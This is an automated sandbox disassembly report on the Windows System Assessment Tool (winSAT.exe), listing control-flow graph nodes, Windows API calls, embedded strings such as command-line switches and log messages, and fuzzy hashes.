32730->32852 32731 7ff780faf9e0 32735 7ff780fa7e24 free 32731->32735 32736 7ff780faf9a0 32732->32736 32734 7ff780faf943 32741 7ff780fa7e24 free 32734->32741 32747 7ff780faf9ea 32735->32747 32854 7ff780fa8978 30 API calls std::bad_exception::bad_exception 32736->32854 32737 7ff780faf960 32737->32728 32738 7ff780faf988 32737->32738 32742 7ff7810a458c numpunct free 32737->32742 32743 7ff7810a458c numpunct free 32738->32743 32740 7ff780faf9b3 32855 7ff780f93a1c 42 API calls numpunct 32740->32855 32744 7ff780faf9c9 32741->32744 32742->32738 32743->32728 32746 7ff780fa7e24 free 32744->32746 32749 7ff780fafa2b 32746->32749 32747->32744 32748 7ff780fafa13 32747->32748 32750 7ff7810a458c numpunct free 32747->32750 32751 7ff7810a458c numpunct free 32748->32751 32752 7ff780fa7e24 32749->32752 32750->32748 32751->32744 32753 7ff780fa7e52 32752->32753 32754 7ff780fa7e34 32752->32754 32753->32578 32754->32753 32755 7ff780fa7e4a 32754->32755 32757 7ff7810a458c numpunct free 32754->32757 32756 7ff7810a458c numpunct free 32755->32756 32756->32753 32757->32755 32857 7ff780fe07b4 RegCreateKeyExW SetLastError 32758->32857 32761 7ff780fe0940 32761->32598 32762 7ff780fe0900 GetLastError 32763 7ff780fe0932 SetLastError 32762->32763 32764 7ff780fe0921 RegCloseKey 32762->32764 32763->32761 32764->32763 32859 7ff780fac4b0 32765->32859 32768 7ff780fcae51 32768->32602 32769 7ff780fe0ea2 32770 7ff780fe08d0 5 API calls 32769->32770 32770->32768 32771 7ff780fe0e9a 32773 7ff7810a458c numpunct free 32771->32773 32772 7ff7810a458c numpunct free 32772->32771 32773->32769 32774->32492 32775->32492 32776->32492 32777->32492 32778->32492 32779->32492 32780->32492 32781->32550 32782->32492 32783->32517 32784->32508 32785->32502 32786->32496 32787->32490 32788->32484 32789->32495 32790->32550 32791->32607 32792->32612 32793->32616 32795->32686 32797 7ff780fa9656 32796->32797 32798 7ff780fa8d9e GetStringTypeExW 32796->32798 32799 7ff7810a4540 numpunct 2 API calls 32797->32799 32798->32692 32800 
7ff780fa9660 32799->32800 32801 7ff780fa9699 32800->32801 32830 7ff780fac6d0 6 API calls numpunct 32800->32830 32801->32798 32803 7ff780fa96bd 32801->32803 32804 7ff7810a458c numpunct free 32801->32804 32805 7ff7810a458c numpunct free 32803->32805 32804->32803 32805->32798 32806->32697 32807->32699 32809 7ff780fa8850 32808->32809 32810 7ff780fa8937 32808->32810 32812 7ff780fa8862 32809->32812 32813 7ff780fa8858 32809->32813 32845 7ff780f930f0 25 API calls numpunct 32810->32845 32816 7ff7810a4540 numpunct 2 API calls 32812->32816 32825 7ff780fa88e5 32812->32825 32831 7ff780fa8410 32813->32831 32814 7ff780fa8951 32846 7ff780f91e60 14 API calls std::bad_exception::bad_exception 32814->32846 32820 7ff780fa888f 32816->32820 32818 7ff780fa885d 32822 7ff7810a5990 7 API calls 32818->32822 32826 7ff780fa88b5 32820->32826 32843 7ff780fabf80 29 API calls std::bad_exception::bad_exception 32820->32843 32821 7ff780fa895f _CxxThrowException 32824 7ff780fa891f 32822->32824 32824->32689 32844 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 32825->32844 32826->32825 32827 7ff780fa88dd 32826->32827 32828 7ff7810a458c numpunct free 32826->32828 32829 7ff7810a458c numpunct free 32827->32829 32828->32827 32829->32825 32830->32801 32832 7ff780fa8436 32831->32832 32833 7ff780fa84a4 32831->32833 32835 7ff7810a4540 numpunct 2 API calls 32832->32835 32848 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 32833->32848 32837 7ff780fa8440 32835->32837 32836 7ff780fa849f 32836->32818 32839 7ff780fa8473 32837->32839 32847 7ff780fac6d0 6 API calls numpunct 32837->32847 32839->32836 32840 7ff780fa8497 32839->32840 32841 7ff7810a458c numpunct free 32839->32841 32842 7ff7810a458c numpunct free 32840->32842 32841->32840 32842->32836 32843->32826 32844->32818 32845->32814 32846->32821 32847->32839 32848->32836 32849->32702 32850->32716 32851->32730 32852->32734 32853->32737 32854->32740 32855->32734 32856->32731 32858 7ff780fe0814 32857->32858 32858->32761 32858->32762 32860 
7ff780fac51d 32859->32860 32861 7ff780fac4d3 32859->32861 32860->32768 32860->32769 32860->32771 32860->32772 32861->32860 32862 7ff780fac50a CompareStringW 32861->32862 32862->32860 32863->32634 32864->32637 32865->32642 32866->32633 32867->32659 32868->32663 32869->32664 32870 7ff780f9eb1e 32871 7ff780f9eb26 SetLastError 32870->32871 32872 7ff780f9eb51 32871->32872 32873 7ff780f9eb56 FreeLibrary 32872->32873 32874 7ff780f9eb65 32872->32874 32873->32874 32932 7ff780fdcdb8 GetConsoleOutputCP 32874->32932 32877 7ff780fce3ac 23 API calls 32878 7ff780f9eb8e 32877->32878 32879 7ff780fcf3b4 44 API calls 32878->32879 32880 7ff780fa04b5 32879->32880 32881 7ff780fa0516 32880->32881 32883 7ff780fa0af1 _CxxThrowException 32880->32883 32885 7ff780fa8a40 GetStringTypeExW 32880->32885 32882 7ff780fca818 104 API calls 32881->32882 32884 7ff780fa051d SetConsoleCtrlHandler 32882->32884 32886 7ff780fa0b0d _CxxThrowException 32883->32886 32887 7ff780fa0531 GetLastError 32884->32887 32888 7ff780fa0583 32884->32888 32897 7ff780fa04d3 32885->32897 32889 7ff780fa0b51 32886->32889 32890 7ff780fa0b41 FreeLibrary 32886->32890 32971 7ff780fa9820 LoadLibraryExW FormatMessageW GetStringTypeExW FreeLibrary 32887->32971 32892 7ff780fa0591 32888->32892 32972 7ff780f9a698 27 API calls 32888->32972 32890->32889 32895 7ff78100b75c 58 API calls 32892->32895 32898 7ff780fa059f 32892->32898 32893 7ff780fa054c 32893->32886 32896 7ff780fa9c0c 38 API calls 32893->32896 32895->32898 32899 7ff780fa0570 32896->32899 32897->32881 32900 7ff780fdb218 3 API calls 32897->32900 32901 7ff780fa05c8 RemoveDirectoryW 32898->32901 32902 7ff780fa05bc CoUninitialize 32898->32902 32903 7ff780fa2944 38 API calls 32899->32903 32904 7ff780fa0506 32900->32904 32908 7ff780fa05e6 32901->32908 32902->32901 32905 7ff780fa057b 32903->32905 32904->32881 32970 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 32904->32970 32906 7ff780fa28c4 36 API calls 32905->32906 32906->32888 32909 7ff780fa0671 ReleaseMutex CloseHandle 
32908->32909 32910 7ff780fa0697 32908->32910 32909->32910 32911 7ff780fa06e3 32910->32911 32973 7ff780f95c78 EventWriteTransfer 32910->32973 32913 7ff780fd5424 76 API calls 32911->32913 32914 7ff780fa06e8 32913->32914 32915 7ff780fcf510 23 API calls 32914->32915 32916 7ff780fa06ed 32915->32916 32917 7ff780fce3ac 23 API calls 32916->32917 32918 7ff780fa0704 32917->32918 32974 7ff780fce2f8 34 API calls 32918->32974 32933 7ff780fdd12d _CxxThrowException 32932->32933 32934 7ff780fdcdf9 32932->32934 32975 7ff780fa595c 32934->32975 32936 7ff780fdce03 32937 7ff780fdd117 _CxxThrowException 32936->32937 32938 7ff780fa595c free 32936->32938 32937->32933 32939 7ff780fdce24 32938->32939 32940 7ff780fdd101 _CxxThrowException 32939->32940 32981 7ff780fdd9d4 32939->32981 32940->32937 32942 7ff780fdce42 32943 7ff780fdd0eb _CxxThrowException 32942->32943 32944 7ff780fdd9d4 2 API calls 32942->32944 32943->32940 32945 7ff780fdce59 GetStdHandle GetStdHandle 32944->32945 32946 7ff780fdd0d5 _CxxThrowException 32945->32946 32947 7ff780fdce91 32945->32947 32946->32943 32992 7ff780fa0dd0 32947->32992 32950 7ff780f92c78 24 API calls 32951 7ff780fdceca 32950->32951 32952 7ff780fdd0bf _CxxThrowException 32951->32952 33007 7ff780fa1e80 32951->33007 32952->32946 32954 7ff780fdd0a9 _CxxThrowException 32954->32952 32955 7ff780fa0dd0 35 API calls 32956 7ff780fdcf0b 32955->32956 32957 7ff780f92c78 24 API calls 32956->32957 32958 7ff780fdcf36 32957->32958 32959 7ff780fdd093 _CxxThrowException 32958->32959 32968 7ff780fa1e80 38 API calls 32958->32968 32959->32954 32960 7ff780fdcf59 32961 7ff780fdcf63 CreateFileW 32960->32961 32964 7ff780fdcf98 32960->32964 32961->32964 32962 7ff780fdd07d _CxxThrowException 32962->32959 32963 7ff780f9eb6f 32963->32877 32964->32962 32964->32963 32965 7ff780fdd067 _CxxThrowException 32964->32965 32966 7ff780fdd051 _CxxThrowException 32964->32966 32967 7ff780fdd03b _CxxThrowException 32964->32967 32965->32962 32966->32965 32967->32966 32968->32960 32970->32881 
32971->32893 32972->32892 32973->32911 32976 7ff780fa59b0 32975->32976 32977 7ff780fa5982 32975->32977 32979 7ff7810a458c numpunct free 32976->32979 32978 7ff7810a458c numpunct free 32977->32978 32980 7ff780fa5987 32978->32980 32979->32980 32980->32936 32982 7ff780fdd9e5 32981->32982 32983 7ff780fdda31 32981->32983 32984 7ff780fdd9f4 32982->32984 32985 7ff780fdda12 32982->32985 32987 7ff7810a458c numpunct free 32983->32987 32989 7ff780fdd9f9 32983->32989 32988 7ff7810a458c numpunct free 32984->32988 32986 7ff7810a458c numpunct free 32985->32986 32986->32989 32990 7ff780fdda5e 32987->32990 32988->32989 32989->32942 32990->32989 33012 7ff780fdd310 ldiv 32990->33012 32993 7ff780fa0e03 32992->32993 32994 7ff780fa0e0c 32992->32994 32993->32994 32995 7ff780fa0e13 GetHandleInformation 32993->32995 32994->32950 32996 7ff780fa0e3c GetFileType 32995->32996 32997 7ff780fa0e2b GetLastError 32995->32997 32998 7ff780fa0e65 32996->32998 32999 7ff780fa0e55 GetLastError 32996->32999 32997->32994 33000 7ff780fa0e7f 32998->33000 33013 7ff780fa3d00 32998->33013 32999->32997 32999->32998 33021 7ff780fdd214 20 API calls numpunct 33000->33021 33003 7ff780fa0e94 33022 7ff780fdd14c 27 API calls numpunct 33003->33022 33005 7ff780fa0eb2 33005->32994 33023 7ff780fdd310 ldiv 33005->33023 33024 7ff780fa1580 33007->33024 33010 7ff780f92c78 24 API calls 33011 7ff780fa1ebf 33010->33011 33011->32954 33011->32955 33012->32989 33014 7ff780fa3d09 33013->33014 33020 7ff780fa3dba 33013->33020 33015 7ff780fa595c free 33014->33015 33018 7ff780fa3d7e 33014->33018 33015->33018 33016 7ff780fa3db1 33019 7ff7810a458c numpunct free 33016->33019 33017 7ff780fa3d99 memmove 33017->33016 33018->33016 33018->33017 33019->33020 33020->33000 33021->33003 33022->33005 33023->32994 33025 7ff780fa15b3 33024->33025 33026 7ff780fa15bc 33024->33026 33025->33026 33027 7ff780fa15c3 GetHandleInformation 33025->33027 33026->33010 33028 7ff780fa15ec GetFileType 33027->33028 33029 7ff780fa15db GetLastError 33027->33029 33030 
7ff780fa1615 33028->33030 33031 7ff780fa1605 GetLastError 33028->33031 33029->33026 33032 7ff780fa162f 33030->33032 33039 7ff780fa4294 memmove free numpunct 33030->33039 33031->33029 33031->33030 33040 7ff780fdd214 20 API calls numpunct 33032->33040 33035 7ff780fa1644 33041 7ff780fdd14c 27 API calls numpunct 33035->33041 33037 7ff780fa1662 33037->33026 33042 7ff780fdd310 ldiv 33037->33042 33039->33032 33040->33035 33041->33037 33042->33026 33043 7ff780fac91c 33044 7ff780fac945 33043->33044 33045 7ff780facef3 _CxxThrowException 33043->33045 33046 7ff780fa8410 29 API calls 33044->33046 33047 7ff780facf08 _CxxThrowException 33045->33047 33048 7ff780fac94d 33046->33048 33049 7ff780facf1d _CxxThrowException 33047->33049 33050 7ff780fac968 GetModuleFileNameW 33048->33050 33287 7ff780fa86a4 33048->33287 33051 7ff780facf32 _CxxThrowException 33049->33051 33054 7ff780fac9bc 33050->33054 33055 7ff780fac98c 33050->33055 33053 7ff780facf47 _CxxThrowException 33051->33053 33059 7ff780facf5c _CxxThrowException 33053->33059 33056 7ff780fac9c1 GetLastError 33054->33056 33057 7ff780fac9e7 33054->33057 33060 7ff780fa8810 31 API calls 33055->33060 33061 7ff780fa8410 29 API calls 33056->33061 33062 7ff780fa8810 31 API calls 33057->33062 33063 7ff780facf71 _CxxThrowException 33059->33063 33064 7ff780fac994 GetModuleFileNameW 33060->33064 33065 7ff780fac9d7 SetLastError 33061->33065 33066 7ff780fac9f2 33062->33066 33067 7ff780facf86 _CxxThrowException 33063->33067 33064->33054 33064->33055 33068 7ff780fac9fa GetLastError 33065->33068 33066->33068 33069 7ff780faca5f 33066->33069 33070 7ff780facf9b _CxxThrowException 33067->33070 33306 7ff780fdc700 GetModuleHandleW 33068->33306 33072 7ff780facede _CxxThrowException 33069->33072 33171 7ff780fa8be8 33069->33171 33073 7ff780facfb0 _CxxThrowException 33070->33073 33072->33045 33074 7ff780facfc5 _CxxThrowException 33073->33074 33077 7ff780facfda _CxxThrowException 33074->33077 33075 7ff780faca1f SetLastError GetLastError 33371 7ff780fce694 55 
API calls numpunct 33075->33371 33079 7ff780facfef _CxxThrowException 33077->33079 33080 7ff780faca53 33081 7ff780faca74 33081->33079 33086 7ff780facabc 33081->33086 33372 7ff780fa8978 30 API calls std::bad_exception::bad_exception 33081->33372 33083 7ff780facb16 33084 7ff780fa7e24 free 33083->33084 33085 7ff780facb26 33084->33085 33085->33074 33090 7ff780fa8be8 34 API calls 33085->33090 33086->33077 33086->33083 33087 7ff780facb0e 33086->33087 33088 7ff7810a458c numpunct free 33086->33088 33089 7ff7810a458c numpunct free 33087->33089 33088->33087 33089->33083 33091 7ff780facb3b 33090->33091 33092 7ff780fa8010 7 API calls 33091->33092 33093 7ff780facb4b 33092->33093 33195 7ff780faf0dc 33093->33195 33095 7ff780facb82 33096 7ff780fa7e24 free 33095->33096 33099 7ff780facb93 33096->33099 33098 7ff780facb7a 33101 7ff7810a458c numpunct free 33098->33101 33099->33073 33216 7ff780fa25a8 33099->33216 33100 7ff7810a458c numpunct free 33100->33098 33101->33095 33103 7ff780facbb3 33104 7ff780fa7e24 free 33103->33104 33105 7ff780facbc2 33104->33105 33234 7ff780fae868 33105->33234 33108 7ff780facbe8 FindResourceW 33110 7ff780face92 GetLastError 33108->33110 33111 7ff780facc1d 33108->33111 33109 7ff780facbcb GetLastError 33109->33108 33112 7ff780fdc700 93 API calls 33110->33112 33373 7ff780fde080 LoadResource SizeofResource LockResource 33111->33373 33114 7ff780faceb7 SetLastError GetLastError 33112->33114 33114->33072 33115 7ff780facc29 33115->33110 33116 7ff780facc3b 33115->33116 33117 7ff780faccc3 33115->33117 33118 7ff780fa8010 7 API calls 33116->33118 33117->33070 33119 7ff780fdc700 93 API calls 33117->33119 33120 7ff780facc4b 33118->33120 33121 7ff780faccea 33119->33121 33374 7ff780fde178 69 API calls 33120->33374 33123 7ff780fa9c0c 38 API calls 33121->33123 33124 7ff780faccf9 33123->33124 33125 7ff780fa2944 38 API calls 33124->33125 33128 7ff780facd04 33125->33128 33126 7ff780facc9a 33127 7ff780fa7e24 free 33126->33127 33130 7ff780faccc1 33127->33130 33131 7ff780fa28c4 36 
API calls 33128->33131 33129 7ff780facc59 33129->33047 33129->33126 33132 7ff780facc92 33129->33132 33135 7ff7810a458c numpunct free 33129->33135 33134 7ff780fa8010 7 API calls 33130->33134 33131->33130 33133 7ff7810a458c numpunct free 33132->33133 33133->33126 33136 7ff780facd1c 33134->33136 33135->33132 33136->33067 33375 7ff780fac894 39 API calls numpunct 33136->33375 33138 7ff780facd3d 33138->33063 33376 7ff780fac894 39 API calls numpunct 33138->33376 33140 7ff780facd60 33377 7ff780fa8148 33140->33377 33144 7ff780facd8c 33145 7ff780fa7e24 free 33144->33145 33146 7ff780facd96 33145->33146 33147 7ff780fa8010 7 API calls 33146->33147 33148 7ff780facda6 33147->33148 33149 7ff780faf0dc 33 API calls 33148->33149 33151 7ff780facdb4 33149->33151 33150 7ff780facdf5 33152 7ff780fa7e24 free 33150->33152 33151->33053 33151->33150 33154 7ff780facded 33151->33154 33155 7ff7810a458c numpunct free 33151->33155 33153 7ff780face05 33152->33153 33153->33051 33157 7ff780fa8a40 GetStringTypeExW 33153->33157 33156 7ff7810a458c numpunct free 33154->33156 33155->33154 33156->33150 33160 7ff780face1a 33157->33160 33158 7ff780face81 33159 7ff780fa7e24 free 33158->33159 33161 7ff780face8b 33159->33161 33160->33049 33160->33158 33162 7ff780fa9c0c 38 API calls 33160->33162 33161->33110 33163 7ff780face59 33162->33163 33391 7ff780faed64 44 API calls numpunct 33163->33391 33165 7ff780face63 33392 7ff780f92e8c 38 API calls 33165->33392 33167 7ff780face6e 33168 7ff780fa2944 38 API calls 33167->33168 33169 7ff780face79 33168->33169 33170 7ff780fa28c4 36 API calls 33169->33170 33170->33158 33172 7ff780fa8d57 33171->33172 33173 7ff780fa8c04 33171->33173 33172->33081 33174 7ff780fa9630 7 API calls 33173->33174 33175 7ff780fa8c09 33174->33175 33176 7ff780fa9630 7 API calls 33175->33176 33177 7ff780fa8c11 33176->33177 33178 7ff780fa9630 7 API calls 33177->33178 33182 7ff780fa8c2a 33178->33182 33179 7ff780fa8d59 33181 7ff780fa8410 29 API calls 33179->33181 33180 7ff780fa8c3a GetStringTypeExW 
33180->33182 33181->33172 33182->33179 33182->33180 33183 7ff780fa8c88 33182->33183 33183->33179 33184 7ff780fa8c91 33183->33184 33185 7ff780fa9630 7 API calls 33184->33185 33186 7ff780fa8c99 33185->33186 33187 7ff780fa8cbe 33186->33187 33188 7ff780fa8810 31 API calls 33186->33188 33189 7ff780fa9630 7 API calls 33187->33189 33188->33187 33190 7ff780fa8cc9 33189->33190 33190->33172 33191 7ff780fa8ce0 GetStringTypeExW 33190->33191 33192 7ff780fa8d2e 33190->33192 33191->33190 33192->33172 33193 7ff780fa8d33 memmove 33192->33193 33194 7ff780fa8810 31 API calls 33193->33194 33194->33172 33196 7ff780fa80d4 6 API calls 33195->33196 33197 7ff780faf103 33196->33197 33198 7ff780fa8410 29 API calls 33197->33198 33199 7ff780faf10e 33198->33199 33200 7ff780faf124 33199->33200 33201 7ff780faf117 33199->33201 33203 7ff780fa86a4 30 API calls 33200->33203 33202 7ff780fa80d4 6 API calls 33201->33202 33215 7ff780faf11f 33202->33215 33204 7ff780faf133 ExpandEnvironmentStringsW 33203->33204 33205 7ff780faf18a 33204->33205 33206 7ff780faf15d 33204->33206 33209 7ff780faf193 33205->33209 33210 7ff780faf19a 33205->33210 33208 7ff780fa86a4 30 API calls 33206->33208 33207 7ff780fa7e24 free 33211 7ff780facb59 33207->33211 33212 7ff780faf16a ExpandEnvironmentStringsW 33208->33212 33213 7ff780fa8410 29 API calls 33209->33213 33393 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 33210->33393 33211->33095 33211->33098 33211->33100 33212->33205 33213->33215 33215->33207 33217 7ff780fa2642 33216->33217 33220 7ff780fa25d6 33216->33220 33398 7ff780f930f0 25 API calls numpunct 33217->33398 33219 7ff780fa265c 33399 7ff780f91dcc 14 API calls std::bad_exception::bad_exception 33219->33399 33221 7ff780fa2630 _CxxThrowException 33220->33221 33222 7ff780fa25f5 33220->33222 33221->33217 33394 7ff780fabd1c 33222->33394 33225 7ff780fa266a _CxxThrowException __uncaught_exception 33227 7ff780fa26a0 33225->33227 33228 7ff780fa26a8 33225->33228 33400 7ff780fa52a0 36 API calls 33227->33400 33230 
7ff780fa26c6 33228->33230 33401 7ff7810a48b8 LeaveCriticalSection 33228->33401 33230->33103 33231 7ff7810a5990 7 API calls 33233 7ff780fa2626 33231->33233 33233->33103 33235 7ff780fae895 GetFileVersionInfoSizeExW 33234->33235 33236 7ff780faeb87 _CxxThrowException 33234->33236 33237 7ff780fae8b2 33235->33237 33244 7ff780fae8fc 33235->33244 33238 7ff780faeb9c _CxxThrowException 33236->33238 33237->33238 33239 7ff780fae8c2 GetLastError 33237->33239 33240 7ff780faebb1 _CxxThrowException 33238->33240 33402 7ff780fce694 55 API calls numpunct 33239->33402 33242 7ff780faebc6 _CxxThrowException 33240->33242 33243 7ff780faebdb _CxxThrowException 33242->33243 33247 7ff780faebf0 _CxxThrowException 33243->33247 33245 7ff780fae927 GetFileVersionInfoW 33244->33245 33246 7ff780faecad _CxxThrowException 33244->33246 33248 7ff780facbc7 33244->33248 33249 7ff780fae991 VerQueryValueW 33245->33249 33250 7ff780fae947 33245->33250 33251 7ff780faec05 _CxxThrowException 33247->33251 33248->33108 33248->33109 33254 7ff780fae9b3 33249->33254 33255 7ff780fae9e4 33249->33255 33250->33240 33252 7ff780fae957 GetLastError 33250->33252 33253 7ff780faec1a _CxxThrowException 33251->33253 33256 7ff780fae976 33252->33256 33257 7ff780faec2f _CxxThrowException 33253->33257 33254->33242 33258 7ff780fae9c3 GetLastError 33254->33258 33259 7ff780faec98 _CxxThrowException 33255->33259 33262 7ff780fa86a4 30 API calls 33255->33262 33403 7ff780fce694 55 API calls numpunct 33256->33403 33261 7ff780faec44 _CxxThrowException 33257->33261 33258->33256 33259->33246 33264 7ff780faec59 _CxxThrowException 33261->33264 33265 7ff780faea09 33262->33265 33263 7ff780fae98a 33268 7ff7810a458c numpunct free 33263->33268 33266 7ff780faec6e _CxxThrowException 33264->33266 33267 7ff780faec83 _CxxThrowException 33265->33267 33404 7ff780fa8b64 38 API calls 33265->33404 33266->33267 33267->33259 33268->33248 33270 7ff780faea2b 33270->33266 33271 7ff780faea3b VerQueryValueW 33270->33271 33272 7ff780faea91 33271->33272 33273 
7ff780faea5d 33271->33273 33272->33264 33405 7ff780faacb8 33272->33405 33273->33243 33274 7ff780faea6d GetLastError 33273->33274 33274->33272 33277 7ff780fa86a4 30 API calls 33278 7ff780faeac4 33277->33278 33278->33257 33418 7ff780fa8b64 38 API calls 33278->33418 33280 7ff780faeae6 33280->33253 33281 7ff780faeaf6 VerQueryValueW 33280->33281 33282 7ff780faeb18 33281->33282 33283 7ff780faeb4c 33281->33283 33282->33247 33284 7ff780faeb28 GetLastError 33282->33284 33283->33251 33285 7ff780faeb5c 33283->33285 33284->33283 33286 7ff780faacb8 35 API calls 33285->33286 33286->33263 33288 7ff780fa8771 33287->33288 33289 7ff780fa86e2 33287->33289 33454 7ff780f930f0 25 API calls numpunct 33288->33454 33290 7ff780fa9630 7 API calls 33289->33290 33292 7ff780fa86e7 33290->33292 33296 7ff7810a4540 numpunct 2 API calls 33292->33296 33301 7ff780fa8748 33292->33301 33293 7ff780fa878b 33455 7ff780f91e60 14 API calls std::bad_exception::bad_exception 33293->33455 33295 7ff7810a5990 7 API calls 33298 7ff780fa875b 33295->33298 33299 7ff780fa86fa 33296->33299 33297 7ff780fa8799 _CxxThrowException 33298->33050 33302 7ff780fa8719 33299->33302 33453 7ff780fabf80 29 API calls std::bad_exception::bad_exception 33299->33453 33301->33295 33302->33301 33303 7ff780fa8740 33302->33303 33304 7ff7810a458c numpunct free 33302->33304 33305 7ff7810a458c numpunct free 33303->33305 33304->33303 33305->33301 33307 7ff780fdc74c 33306->33307 33456 7ff780fdc5d8 33307->33456 33310 7ff780fdc88f 33314 7ff780fdc8a7 _CxxThrowException 33310->33314 33311 7ff780fdc7b8 SizeofResource 33312 7ff780fdc7d2 LoadResource 33311->33312 33313 7ff780fdc8b8 33311->33313 33315 7ff780fdc8e4 33312->33315 33316 7ff780fdc7ed LockResource 33312->33316 33317 7ff780fdc8d3 _CxxThrowException 33313->33317 33314->33313 33318 7ff780fdc8ff _CxxThrowException 33315->33318 33319 7ff780fdc910 33316->33319 33325 7ff780fdc808 33316->33325 33317->33315 33318->33319 33320 7ff780fdc92b _CxxThrowException 33319->33320 33321 7ff780fdc93c 
34362->34353 34365 7ff780fa9c0c 38 API calls 34362->34365 34364->34367 34368 7ff780fa0570 34365->34368 34366->34345 34369 7ff780fdb218 3 API calls 34366->34369 34370 7ff780fa05c8 RemoveDirectoryW 34367->34370 34371 7ff780fa05bc CoUninitialize 34367->34371 34372 7ff780fa2944 38 API calls 34368->34372 34373 7ff780fa0506 34369->34373 34377 7ff780fa05e6 34370->34377 34371->34370 34374 7ff780fa057b 34372->34374 34373->34345 34394 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 34373->34394 34375 7ff780fa28c4 36 API calls 34374->34375 34375->34355 34378 7ff780fa0671 ReleaseMutex CloseHandle 34377->34378 34379 7ff780fa0697 34377->34379 34378->34379 34380 7ff780fa06e3 34379->34380 34397 7ff780f95c78 EventWriteTransfer 34379->34397 34382 7ff780fd5424 76 API calls 34380->34382 34383 7ff780fa06e8 34382->34383 34384 7ff780fcf510 23 API calls 34383->34384 34385 7ff780fa06ed 34384->34385 34386 7ff780fce3ac 23 API calls 34385->34386 34387 7ff780fa0704 34386->34387 34398 7ff780fce2f8 34 API calls 34387->34398 34394->34345 34395->34362 34396->34361 34397->34380

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
• Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalEnabledErrorEventFileSection$AddressCloseControlCountCurrentDeviceEnterLastLeaveLibraryLoadProcProcessStatusTickWrite_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > Successfully reenabled EMD.$> Unable to reenable EMD device; %s$CKCLStart$ERROR: Could not disable cache hits: %x$INFO: DwmpRestartComposition() did not return OK!$Warning: Composition Restart not supported$Warning: Composition Restart not supported$base\winsat\exe\main.cpp$dwmapi.dll$filename
                                                                                                                                                                                              • API String ID: 1964248110-1335994959
                                                                                                                                                                                              • Opcode ID: e9eb2a1a579d24866fde3a24d272d10362c80194d6bbfe6e952583cb9f19237b
                                                                                                                                                                                              • Instruction ID: f2b6ab72a4e2b2b780bcfb32ffc05197af4baf3275ade767dbcf3e5f192bc1ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9eb2a1a579d24866fde3a24d272d10362c80194d6bbfe6e952583cb9f19237b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50D19C22A0C64282EB14FB62E8502B8A760FF85B58FE49136DA4D477D5DF7CF445C360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$Free$DefaultLanguageLoadVersion$FindInfoLocalePathResourceSearchSystemUsermemsetwcsncmp
                                                                                                                                                                                              • String ID: %s\%s$MUI
                                                                                                                                                                                              • API String ID: 1026695814-2651373239
                                                                                                                                                                                              • Opcode ID: 701d8b758094d34970f139c57480a43268e7718bfe01592a2d53b6fbec55cb7e
                                                                                                                                                                                              • Instruction ID: 363af238377d576cbbbbec4bae6d7fbaf2777f2314588a00fc94a4b3d68e4788
                                                                                                                                                                                              • Opcode Fuzzy Hash: 701d8b758094d34970f139c57480a43268e7718bfe01592a2d53b6fbec55cb7e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE1C265A1CA8286EB65BB9199006F9E3A1FF45BC4FE51432ED4E07B48EF7CE501C320
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CloseCommandLineOpenQueryValue
                                                                                                                                                                                              • String ID: %windir%\performance\winsat\$-- Skipping Schema check! (private only)$SaveETLFiles$SuppressWatchDogTimer$admp$base\winsat\exe\app.cpp$cancelevent$cpuff$datastore$fonbat$glpi$help$icn$iguid$iter$kdr$log$moobegoevent$no file name after the -cpuff switch$no file name after the -txml switch$note$requirebatt$ssc$suppresswd$txml$unsupported$watchdog$wsswap$xml$xwait$xwdfinal
                                                                                                                                                                                              • API String ID: 2913300774-4180261194
                                                                                                                                                                                              • Opcode ID: b353203be41a2b1269e035ff50954222662dba66c0a6a26e508a4c20b0642890
                                                                                                                                                                                              • Instruction ID: 74a1da2d596fd0cc2e18872968ef45507e2f5428e1d69df95ea52146eec2e7d4
                                                                                                                                                                                              • Opcode Fuzzy Hash: b353203be41a2b1269e035ff50954222662dba66c0a6a26e508a4c20b0642890
                                                                                                                                                                                              • Instruction Fuzzy Hash: 07E26B22F0D64696EB10FBA2E8500FCA771BF45748BE49436C90E17ADADF6CE915C360

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseConsoleCtrlDirectoryErrorHandleHandlerLastMutexReleaseRemoveUninitialize
